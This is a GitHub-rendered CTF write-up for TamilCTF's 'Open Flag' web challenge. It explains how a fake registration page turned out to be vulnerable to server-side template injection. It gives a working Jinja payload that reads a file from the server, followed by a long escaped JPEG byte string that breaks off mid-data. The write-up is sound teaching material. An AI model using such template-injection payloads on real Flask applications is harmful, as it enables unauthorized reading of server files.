<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path></svg> <span>More</span> </div></summary> <div data-view-component="true"> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Wiki Security Insights
</details-menu></div></details></div></nav> </div>
<div class="clearfix new-discussion-timeline container-xl px-3 px-md-4 px-lg-5"> <div id="repo-content-pjax-container" class="repository-content " >
<div>
Permalink
<div class="d-flex flex-items-start flex-shrink-0 pb-3 flex-wrap flex-md-nowrap flex-justify-between flex-md-justify-start"> <div class="position-relative"> <details class="details-reset details-overlay mr-0 mb-0 " id="branch-select-menu"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path fill-rule="evenodd" d="M11.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122V6A2.5 2.5 0 0110 8.5H6a1 1 0 00-1 1v1.128a2.251 2.251 0 11-1.5 0V5.372a2.25 2.25 0 111.5 0v1.836A2.492 2.492 0 016 7h4a1 1 0 001-1v-.628A2.25 2.25 0 019.5 3.25zM4.25 12a.75.75 0 100 1.5.75.75 0 000-1.5zM3.5 3.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0z"></path></svg> <span>branch</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" class="d-flex flex-column flex-auto overflow-auto" tabindex=""> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/dyn20/Writeups-CTF/refs" cache-key="v0:1634119658.046334" current-committish="YnJhbmNo" default-branch="YnJhbmNo" name-with-owner="ZHluMjAvV3JpdGV1cHMtQ1RG" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" class="d-flex flex-column flex-auto overflow-auto" tabindex="" hidden> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/dyn20/Writeups-CTF/refs" cache-key="v0:1634119658.046334" current-committish="YnJhbmNo" default-branch="YnJhbmNo" name-with-owner="ZHluMjAvV3JpdGV1cHMtQ1RG" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<h2 id="blob-path" class="breadcrumb flex-auto flex-self-center min-width-0 text-normal mx-2 width-full width-md-auto flex-order-1 flex-md-order-none mt-3 mt-md-0"> <span><span><span>Writeups-CTF</span></span></span><span>/</span><span><span>TamilCTF</span></span><span>/</span><span><span>Open Flag</span></span><span>/</span>README.md </h2> Go to file
<details id="blob-more-options-details" data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true" class="btn"> <svg aria-label="More options" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path></svg>
</summary> <div data-view-component="true"> <span>Go to file</span> <span>T</span> <button data-toggle-for="jumpto-line-details-dialog" type="button" data-view-component="true" class="dropdown-item btn-link"> <span> <span>Go to line</span> <span>L</span> </span>
</button> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy path" value="TamilCTF/Open Flag/README.md" data-view-component="true" class="dropdown-item cursor-pointer"> Copy path
</clipboard-copy> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy permalink" value="https://github.com/dyn20/Writeups-CTF/blob/c31b25826dd773c9e16749d23e51b4821631efbe/TamilCTF/Open%20Flag/README.md" data-view-component="true" class="dropdown-item cursor-pointer"> <span> <span>Copy permalink</span> </span>
</clipboard-copy> </div></details> </div>
<div class="Box d-flex flex-column flex-shrink-0 mb-3"> <include-fragment src="/dyn20/Writeups-CTF/contributors/branch/TamilCTF/Open%20Flag/README.md" class="commit-loader"> <div class="Box-header d-flex flex-items-center"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-2"> </div> </div>
<div class="Box-body d-flex flex-items-center" > <div class="Skeleton Skeleton--text col-1"> </div> <span>Cannot retrieve contributors at this time</span> </div></include-fragment> </div>
<readme-toc>
<div data-target="readme-toc.content" class="Box mt-3 position-relative"> <div class="Box-header blob-header js-sticky js-position-sticky top-0 p-2 d-flex flex-shrink-0 flex-md-row flex-items-center" style="position: sticky; z-index: 1;" >
<details data-target="readme-toc.trigger" data-menu-hydro-click="{"event_type":"repository_toc_menu.click","payload":{"target":"trigger","repository_id":391126667,"originating_url":"https://github.com/dyn20/Writeups-CTF/blob/branch/TamilCTF/Open%20Flag/README.md","user_id":null}}" data-menu-hydro-click-hmac="5995c912b1759f6f36f3ea444c7a6427c7bee121a882358a9c2b5880aa47c91f" class="dropdown details-reset details-overlay"> <summary class="btn btn-octicon m-0 mr-2 p-2" aria-haspopup="true" aria-label="Table of Contents"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-list-unordered"> <path fill-rule="evenodd" d="M2 4a1 1 0 100-2 1 1 0 000 2zm3.75-1.5a.75.75 0 000 1.5h8.5a.75.75 0 000-1.5h-8.5zm0 5a.75.75 0 000 1.5h8.5a.75.75 0 000-1.5h-8.5zm0 5a.75.75 0 000 1.5h8.5a.75.75 0 000-1.5h-8.5zM3 8a1 1 0 11-2 0 1 1 0 012 0zm-1 6a1 1 0 100-2 1 1 0 000 2z"></path></svg> </summary>
<details-menu class="SelectMenu" role="menu"> <div class="SelectMenu-modal rounded-3 mt-1" style="max-height:340px;">
<div class="SelectMenu-list SelectMenu-list--borderless p-2" style="overscroll-behavior: contain;"> Category: Web Type: SSTI My English is bad. I'm sorry if it confuses you while reading my writeup. Thank you for your reading! </div> </div> </details-menu></details>
<div class="text-mono f6 flex-auto pr-3 flex-order-2 flex-md-order-1">
50 lines (30 sloc) <span></span> 81.1 KB </div>
<div class="d-flex py-1 py-md-0 flex-auto flex-order-1 flex-md-order-2 flex-sm-grow-0 flex-justify-between hide-sm hide-md"> <div class="BtnGroup"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path></svg>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg>
</div>
<div class="BtnGroup"> Raw
Blame
</div>
<div> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-device-desktop"> <path fill-rule="evenodd" d="M1.75 2.5h12.5a.25.25 0 01.25.25v7.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25v-7.5a.25.25 0 01.25-.25zM14.25 1H1.75A1.75 1.75 0 000 2.75v7.5C0 11.216.784 12 1.75 12h3.727c-.1 1.041-.52 1.872-1.292 2.757A.75.75 0 004.75 16h6.5a.75.75 0 00.565-1.243c-.772-.885-1.193-1.716-1.292-2.757h3.727A1.75 1.75 0 0016 10.25v-7.5A1.75 1.75 0 0014.25 1zM9.018 12H6.982a5.72 5.72 0 01-.765 2.5h3.566a5.72 5.72 0 01-.765-2.5z"></path></svg>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-pencil"> <path fill-rule="evenodd" d="M11.013 1.427a1.75 1.75 0 012.474 0l1.086 1.086a1.75 1.75 0 010 2.474l-8.61 8.61c-.21.21-.47.364-.756.445l-3.251.93a.75.75 0 01-.927-.928l.929-3.25a1.75 1.75 0 01.445-.758l8.61-8.61zm1.414 1.06a.25.25 0 00-.354 0L10.811 3.75l1.439 1.44 1.263-1.263a.25.25 0 000-.354l-1.086-1.086zM11.189 6.25L9.75 4.81l-6.286 6.287a.25.25 0 00-.064.108l-.558 1.953 1.953-.558a.249.249 0 00.108-.064l6.286-6.286z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-trash"> <path fill-rule="evenodd" d="M6.5 1.75a.25.25 0 01.25-.25h2.5a.25.25 0 01.25.25V3h-3V1.75zm4.5 0V3h2.25a.75.75 0 010 1.5H2.75a.75.75 0 010-1.5H5V1.75C5 .784 5.784 0 6.75 0h2.5C10.216 0 11 .784 11 1.75zM4.496 6.675a.75.75 0 10-1.492.15l.66 6.6A1.75 1.75 0 005.405 15h5.19c.9 0 1.652-.681 1.741-1.576l.66-6.6a.75.75 0 00-1.492-.149l-.66 6.6a.25.25 0 01-.249.225h-5.19a.25.25 0 01-.249-.225l-.66-6.6z"></path></svg> </div> </div>
<div class="d-flex hide-lg hide-xl flex-order-2 flex-grow-0"> <details class="dropdown details-reset details-overlay d-inline-block"> <summary class="btn-octicon p-2" aria-haspopup="true" aria-label="possible actions"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path></svg> </summary>
Open with Desktop View raw View blame
</details> </div></div>
<div id="readme" class="Box-body readme blob js-code-block-container p-5 p-xl-6 gist-border-0"> <article class="markdown-body entry-content container-lg" itemprop="text"><h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg>Category: Web</h1><h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg>Type: SSTI</h2><h3><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg><em>My English is bad. I'm sorry if it confuses you while reading my writeup.</em></h3>Open the challenge, you will see a register page, but it's fake register page.With any input, you will receive a page with the information about flag's location.View source and take a look to comment part, you will see that, it renders your username. So what can we do?With my experience, maybe username input has a vulnerability name ssti.Let try with payload {{1+1}}oh, We get hello 2No doubt, it's ssti.This is a basic ssti challenge, no filtered word here. You can easily find payload for this challenge.Here is my payload, you can refer it:<div class="snippet-clipboard-content position-relative overflow-auto" data-snippet-clipboard-copy-content="{{url_for.__globals__.__builtins__.open("flag.jpg","rb").read()}}">{{url_for.__globals__.__builtins__.open("flag.jpg","rb").read()}}</div><em>* Note that you must be read file in binary mode, because this is jpg file</em>After reading file, let convert the data we read back to jpg file:<em>* Remember that data you receive is HTML encoded data, you must decode it first.</em>You can refer my code:<div class="snippet-clipboard-content position-relative overflow-auto" data-snippet-clipboard-copy-content="rawdata = b'\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xdb\x00\x84\x00\x06\x06\x06\x06\x07\x06\x07\x08\x08\x07\n\x0b\n\x0b\n\x0f\x0e\x0c\x0c\x0e\x0f\x16\x10\x11\x10\x11\x10\x16"\x15\x19\x15\x15\x19\x15"\x1e$\x1e\x1c\x1e$\x1e6*&&*6>424>LDDL_Z_||\xa7\x01\x06\x06\x06\x06\x07\x06\x07\x08\x08\x07\n\x0b\n\x0b\n\x0f\x0e\x0c\x0c\x0e\x0f\x16\x10\x11\x10\x11\x10\x16"\x15\x19\x15\x15\x19\x15"\x1e$\x1e\x1c\x1e$\x1e6*&&*6>424>LDDL_Z_||\xa7\xff\xc2\x00\x11\x08\x02\xd0\x05\x00\x03\x01"\x00\x02\x11\x01\x03\x11\x01\xff\xc4\x002\x00\x01\x00\x02\x03\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x06\x03\x04\x07\x02\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\xff\xda\x00\x0c\x03\x01\x00\x02\x10\x03\x10\x00\x00\x02\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xec\xf0\x90\xccD\xa5\xf1\x11\xac\xb8\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xeb\xd4\xf1\xa7\'\xe8\x80\x01\xf3B@V1\xd9\xa0\x0c\x01@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1e\xbc\xcf\x19v\x04\x00\x00\x00c\xc8+Xlu\xe5\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1fM\xe9\xccYP\x00\x00\x00\x00\x11r\x9eJ\xb36\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x84}\x88\xd9b\xd2I$\x0e\x02\xc7\xe2\x1f\xdc\xb2\x7f#\xbe\x92\x1fc\xbe\x12y!\xfe\x13_k\x99\x12}\x15\xbdZ\x90\xd6\x8a\xca\xf9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19w\xe2\xc7\xaf \xd9\xd6\xc9\x1b\xf8\xf4\x04\x96X\x8fD\xae-\x0f\x06\xff\x00\xb8\xd1#\x1d\x97\xc9\xe3\xef\xc5o\xe3\xd4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xf7!\x89\xb7\xaf\x1e\x05\x00\x00\x07\xd9H\x8af\xc7^@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\xd8\xb7d\xf9\xf4\xac\xf3\x95\xebV7Z\xd6\xb8%\xaaI\xcc%\x8a\x8c\xb4,\xa7\xe6\xb5\xfcH\xecr\xb0k\x1a:s\xc1\x83{T\xc6\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xce\t\x13\x13\xcf\xb4\xf9`\xaf\xedgVG\xcf\xbc\xfa\x00>\x9f\x01\xf2\xaf-\t\xbec\xe6\xf3\xf3NGL\xc4\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xcb\x97SvSI\xa9\xad\xad%\xa2yd\x1b\xf3uM\xdcny\x14\x96U\x14%u4\xa3\xac\xf1\xe7\xdbx\xc7\xef\xe6\xf1\xb9\xa8\x10-\xed\\\xdcc4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x1a\xfb\x9b\x9b\x03\xdb\x80@\x00\x00\x00\x00\x00\x00\x01c\xbcf\xc3\xe0\xd8J\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03c^GS\xd8\xf7`\x10\x00\x07\xd3\xe3og\x16-\'\xa6`\x1b\x80\x00\x00\xf4h`\x9e\x81\xf9\xfd\x01@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xcbc\x8e\x94H\x9f\x991\xfb\xf9\x85\x00\x02^*\xcb\xc6\xfa\xf7\x97\xd7\x97z\xf8\xf71\x15\xdd9\xe8\x1ff\x03\xa4\x00\x06l;X\xbb\x95\xfb\x0e\x9f\x87p\x02\xd0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xaf2D\xb7\xb14u\xb7\xb4}\x98\x0e\x90\x00>\xd8\xab\x9b\x1c\xed\xab\xecn\xe7\x93y\xb1\xe3\x8f<C\xfb\xf1\xec\xe6\x1b\x00\x02B>S\x86\xbd\x8f6\xab\x9a\xf3P\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb1\xc2X\xd0\x0cq\x92\xd1~\x9c\xf9\x1d\xf2\x00\x00=\xf8\x1e\xbc\x80( \x00{\x94\x8f\x90\xf2\xe88\xeb\xcdb\xd3\x08\xb1\xe0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$&\xeb\xd6\x14\x01\x1d#\x8b\xa4\x8d{\xf1\xec\xc0\x00\x00\x00\x00\x00\x00\xcd\x19\xf6\xbc\xfa\xf1t\x0c\x91R\xb0\xa4pP\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x015\n-h\r\x82_\x0cw\x8dL\xbeu^\x9c\xed5Vm5F\xd3W\xe1\xb6\xd5F\xd3U[MQ\xb4\xd5\x1bMQ\xb7\xebI,\xff\x00\xa8\x87\x93R\xe8\x8c$\x94\x03\xe2\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x